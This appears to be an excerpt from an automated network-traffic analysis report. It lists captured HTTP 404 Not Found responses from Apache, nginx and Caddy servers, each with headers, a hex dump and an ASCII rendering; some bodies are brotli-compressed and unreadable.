Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:06:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 Jun 2024 13:07:31 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_8e90bb3ee2fe74bab89e36a68cedf695Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 Jun 2024 13:07:34 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_f018a453e4ef277c5677f4d4912cf357Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 Jun 2024 13:07:36 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_b6804f04be789205aab4f153b14347b3Content-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=\|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 05 Jun 2024 13:07:39 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web4X-Frontend: frontend1X-Trace-Id: ti_182aafc96bfd624190b1aed8549e7cc4Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Wed, 05 Jun 2024 13:07:45 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Wed, 05 Jun 2024 13:07:47 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 18Content-Type: text/plainDate: Wed, 05 Jun 2024 13:07:50 GMTServer: CaddyConnection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:08:45 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:08:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:08:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
